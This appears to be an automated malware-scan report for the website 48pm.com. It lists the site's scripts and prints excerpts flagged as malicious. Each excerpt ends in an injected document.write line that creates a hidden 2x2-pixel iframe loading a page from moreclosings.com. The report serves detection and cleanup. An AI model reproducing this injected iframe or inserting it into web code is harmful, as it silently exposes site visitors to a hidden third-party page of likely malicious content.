Scanned pages/files
Request | Server response | Status |
http://www.48pm.com/ | 200 OK Content-Length: 32756 Content-Type: text/html | clean |
http://www.48pm.com/js/loadevent.js | 200 OK Content-Length: 396 Content-Type: application/x-javascript | malicious |
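Malicious code - confirmed by antiviruses (see below):
function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function() { if (oldonload) { oldonload(); } func(); } } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>');
Note: the final document.write(...) statement is the part the scanner flags. It writes a 2x2-pixel iframe that loads a page from moreclosings.com, and the identical statement ends every other code excerpt in this report. The addLoadEvent function before it appears to be the file's ordinary content. Because the same statement is appended to many of the site's own scripts as served, cleanup should cover every .js file listed here, not only the ones marked "malicious".
Antivirus reports: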
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/styleswitcher.js | 200 OK Content-Length: 8487 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getAllSheets() { if( !window.ScriptEngine && navigator.__ice_version ) { return document.styleSheets; } if( document.getElementsByTagName ) { var Lt = document.getElementsByTagName('link'), St = document.getElementsByTagName('style'); } else if( document.styleSheets && document.all ) { var Lt = document.all.tags('LINK'), St = document.all.tags('STYLE'); } else { return []; } for( var x = 0, os = []; Lt[x]; x++ ) { var rel = Lt[x].rel ? Lt[x].rel $('more_'+i).style.display = ''; $('link_'+i).innerHTML = 'less <img src=\"http://www.originalsignal.com/images/less.gif\" alt=\"fold\" />'; } } } } function setStyle() { if (getCookie('fontsize') == 'big') { changeStyle('big'); } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/prototype.js | 200 OK Content-Length: 55314 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/scriptaculous.js | 200 OK Content-Length: 2412 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/default.js | 200 OK Content-Length: 3942 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function setCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=365; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString(); } function getCookie(name) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ((!start) && (name != do var wint = (screen.height - 450) / 2; var thevars = 'resizable=yes,scrollbars=yes,status=0,menubar=no,width=460,height=450,top=' + wint + ',left=' + winl; newwindow=window.open(url,'popup',thevars); if (window.focus) {newwindow.focus()} return false; } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/lightbox.js | 200 OK Content-Length: 6080 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var detect = navigator.userAgent.toLowerCase(); var OS,browser,version,total,thestring; function getBrowserInfo() { if (checkIt('konqueror')) { browser = "Konqueror"; OS = "Linux"; } else if (checkIt('safari')) browser = "Safari" else if (checkIt('omniweb')) browser = "OmniWeb" else if (checkIt('opera')) browser = "Opera" else if (checkIt('webtv')) browser = "WebTV"; else if (checkIt('icab')) browser = "iCab" else if (checkIt('m lb = document.createElement('div'); lb.id = 'lightbox'; lb.className = 'loading'; lb.innerHTML = '<div id="lbLoadMessage">' + '<p>Loading</p>' + '</div>'; bod.appendChild(overlay); bod.appendChild(lb); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/boxover2.js | 200 OK Content-Length: 11099 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/menu.js | 200 OK Content-Length: 1145 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function makeActive(tab) { el = document.getElementById(tab); el.style.backgroundImage= 'url(http://www.originalsignal.com/images/bg_tab6.gif)'; el.style.height = '21px'; el.style.marginTop = '-4px'; el.style.paddingTop = '7px'; } function hideActive(tab) { el = document.getElementById(tab); el.style.backgroundImage= ''; } function showSub(id,subid) { el = document.getElementById(subid); el.style.visi tid.style.marginTop = '-4px'; tid.style.paddingTop = '7px'; } function hideSub(id,subid) { el = document.getElementById(subid); el.style.visibility = 'hidden'; tid = document.getElementById(id); tid.style.backgroundImage= ''; } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/fader.js | 200 OK Content-Length: 877 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/beansmenu.js | 200 OK Content-Length: 773 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://www.48pm.com/js/beanspopbox.js | 200 OK Content-Length: 4210 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=276998 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=276998> | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://www.48pm.com/mobile | 404 Not Found Content-Length: 310 Content-Type: text/html | clean |
http://www.48pm.com/test404page.js | 404 Not Found Content-Length: 318 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 48pm.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 48pm.com
Referer: http://www.google.com/search?q=48pm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=48pm.com
Result: This site is not currently listed as suspicious.
Note: a blacklist lookup reflects only what the list has recorded so far. It does not contradict the hidden-iframe findings in the scanned files above.
Query: http://yandex.com/infected?l10n=en&url=http://48pm.com/
Result: 48pm.com is not infected or malware details are not published yet.